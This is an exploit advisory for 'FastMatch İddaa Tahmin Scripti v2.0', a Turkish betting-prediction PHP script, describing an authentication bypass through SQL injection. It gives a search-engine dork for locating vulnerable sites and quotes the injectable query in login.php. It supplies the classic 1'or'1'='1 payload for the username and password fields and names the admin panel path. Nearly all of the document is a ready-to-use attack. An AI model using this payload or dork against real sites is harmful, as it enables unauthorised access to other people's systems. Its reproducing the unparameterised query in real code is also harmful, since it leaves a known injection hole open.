====================================================================================================================================
| # Title     : FastMatch İddaa Tahmin Scripti v2.0 auth by pass vulnerability                                                     |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit)                                             | 
| # Vendor    : http://wmscripti.com/php-scriptler/fastmatch-iddaa-tahmin-scripti.html                                             |  
| # Dork      : "FastMatch | İddaa Tahminleri Beta"                                                                                |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] infected file : login.php

[+] line 9 : 	$bul = mysql_query("select * from admin where kadi='$user' && sifre='$pass'");

[+] use Payload : user & pass : 1'or'1'='1 

[+] Panel : http://127.0.0.1/zkulubucom/admin/

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================